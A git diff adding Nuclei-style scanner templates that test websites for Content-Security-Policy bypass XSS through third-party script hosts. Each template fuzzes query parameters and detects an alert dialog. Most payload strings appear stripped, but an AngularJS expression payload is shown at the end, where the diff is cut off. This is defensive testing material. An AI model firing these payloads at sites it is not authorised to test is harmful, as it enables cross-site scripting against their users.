+++ b/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: chartbeat-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Chartbeat API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,chartbeat + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: chartbeat_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "chartbeat_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml new file mode 100644 index 00000000000..e1321d3dc8e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/client-api-arkoselabs-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: client-api-arkoselabs-csp-xss + +info: + name: Content-Security-Policy Bypass via Arkose Labs Client API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,arkoselabs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: client_api_arkoselabs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "client_api_arkoselabs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml new file mode 100644 index 00000000000..cd897434b83 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/client-crisp-chat-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: client-crisp-chat-csp-xss + +info: + name: Content-Security-Policy Bypass via Crisp Chat Client + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,crisp + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: client_crisp_chat_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "client_crisp_chat_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml new file mode 100644 index 00000000000..192f40c720a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/clients1-google-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: clients1-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Clients1 + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: clients1_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "clients1_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml new file mode 100644 index 00000000000..2e869168bd1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/code-angularjs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: code-angularjs-csp-xss + +info: + name: Content-Security-Policy Bypass via AngularJS CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,angularjs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: code_angularjs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "code_angularjs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml b/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml new file mode 100644 index 00000000000..acb17ad55fd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/commerce-coinbase-csp-xss.yaml @@ -0,0 +1,55 @@ +id: commerce-coinbase-csp-xss + +info: + name: Content-Security-Policy Bypass via Coinbase Commerce + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,coinbase + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: commerce_coinbase_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "commerce_coinbase_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml b/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml new file mode 100644 index 00000000000..6a3e564d43e --- /dev/null 
+++ b/dast/vulnerabilities/xss/csp/common-like-naver-csp-xss.yaml @@ -0,0 +1,55 @@ +id: common-like-naver-csp-xss + +info: + name: Content-Security-Policy Bypass via Naver Like + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,naver + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: common_like_naver_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "common_like_naver_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml b/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml new file mode 100644 index 00000000000..bb9448436bf --- /dev/null +++ b/dast/vulnerabilities/xss/csp/connect-mail-ru-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: connect-mail-ru-csp-xss + +info: + name: Content-Security-Policy Bypass via Mail.ru Connect + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,mailru + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: connect_mail_ru_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "connect_mail_ru_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml new file mode 100644 index 00000000000..b5c9ce53bc2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/content-akamai-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: content-akamai-csp-xss + +info: + name: Content-Security-Policy Bypass via Akamai Content + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,akamai + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: content_akamai_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "content_akamai_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml new file mode 100644 index 00000000000..2b6fe919e85 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cse-google-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: cse-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Custom Search + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cse_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cse_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml new file mode 100644 index 00000000000..6670f774a92 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cxense-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: cxense-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Cxense API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cxense + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cxense_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cxense_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml b/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml new file mode 100644 index 00000000000..a12d28c22e0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/d-adroll-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: d-adroll-csp-xss + +info: + name: Content-Security-Policy Bypass via AdRoll + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,adroll + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: d_adroll_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "d_adroll_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml b/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml new file mode 100644 index 00000000000..390bffe9793 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/d1xrp9zhb3ks3c-cloudfront-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: d1xrp9zhb3ks3c-cloudfront-csp-xss + +info: + name: Content-Security-Policy Bypass via CloudFront + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cloudfront + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: d1xrp9zhb3ks3c_cloudfront_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "d1xrp9zhb3ks3c_cloudfront_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml new file mode 100644 index 00000000000..7bd93e8cbd0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dailymotion-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: dailymotion-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Dailymotion API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,dailymotion + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dailymotion_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dailymotion_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml new file mode 100644 index 00000000000..41aff8535af --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dblp-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: dblp-csp-xss + +info: + name: Content-Security-Policy Bypass via DBLP + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,dblp + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dblp_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dblp_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml new file mode 100644 index 00000000000..0fac2a05425 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/demo-matomo-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: demo-matomo-csp-xss + +info: + name: Content-Security-Policy Bypass via Matomo Demo + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,matomo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: demo_matomo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "demo_matomo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml new file mode 100644 index 00000000000..b464325ecdd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dev-virtualearth-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: dev-virtualearth-csp-xss + +info: + name: Content-Security-Policy Bypass via Virtual Earth + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,virtualearth + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dev_virtualearth_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dev_virtualearth_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml b/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml new file mode 100644 index 00000000000..fe2344d5f56 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/developer-apple-csp-xss.yaml @@ -0,0 +1,55 @@ +id: developer-apple-csp-xss + +info: + name: Content-Security-Policy Bypass via Apple Developer + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,apple + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: developer_apple_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "developer_apple_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml b/dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml similarity index 54% rename from dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml rename to dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml index 3b0a14968b5..352443f01a7 100644 --- a/dast/vulnerabilities/xss/csp/digitalocean-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/digitalocean-anchor-csp-xss.yaml @@ -1,11 +1,11 @@ -id: digitalocean-csp-xss +id: digitalocean-anchor-csp-xss info: name: Content-Security-Policy Bypass via DigitalOcean Anchor - author: DhiyaneshDK - severity: high + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L12C25-L12C151 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,digitalocean 
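Review bot: The digitalocean-anchor reference replaces a commit-pinned, line-anchored link (`.../CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L12C25-L12C151`) with `.../CSPBypass/blob/main/data.tsv`, so the exact row that backs `verified: true` can no longer be located once the upstream TSV is edited. Keeping the pinned URL as a second entry under `reference:` preserves provenance at no cost; the fwmrm hunk later in this change makes the same substitution.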
@@ -33,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "anchor.digitalocean.com" - - "script-src" - condition: and \ No newline at end of file + - action: waitload + + - action: waitdialog + name: digitalocean_anchor_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "digitalocean_anchor_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml new file mode 100644 index 00000000000..c1018966e39 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/documentation-resources-opendatasoft-csp-xss.yaml @@ -0,0 +1,55 @@ +id: documentation-resources-opendatasoft-csp-xss + +info: + name: Content-Security-Policy Bypass via Opendatasoft Documentation + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,opendatasoft + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: documentation_resources_opendatasoft_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "documentation_resources_opendatasoft_csp_xss == true" \ No newline at end of file 
diff --git a/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml b/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml new file mode 100644 index 00000000000..c9f676fd230 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/don-bild-csp-xss.yaml @@ -0,0 +1,55 @@ +id: don-bild-csp-xss + +info: + name: Content-Security-Policy Bypass via Bild + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bild + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: don_bild_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "don_bild_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml new file mode 100644 index 00000000000..42594a19e6d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dpm-demdex-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: dpm-demdex-csp-xss + +info: + name: Content-Security-Policy Bypass via Demdex + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,demdex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dpm_demdex_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dpm_demdex_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml new file mode 100644 index 00000000000..fe6a00a0076 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/duckduckgo-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: duckduckgo-api-csp-xss + +info: + name: Content-Security-Policy Bypass via DuckDuckGo API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,duckduckgo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: duckduckgo_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "duckduckgo_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml new file mode 100644 index 00000000000..15b67acae93 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/dynamic-criteo-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: dynamic-criteo-csp-xss + +info: + name: Content-Security-Policy Bypass via Criteo Dynamic + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,criteo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: dynamic_criteo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "dynamic_criteo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml b/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml new file mode 100644 index 00000000000..55af634a271 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/elysiumwebsite-s3-csp-xss.yaml @@ -0,0 +1,55 @@ +id: elysiumwebsite-s3-csp-xss + +info: + name: Content-Security-Policy Bypass via Elysium S3 + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,aws + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
foo
{{ [1].reduce(value.alert, 1); }}
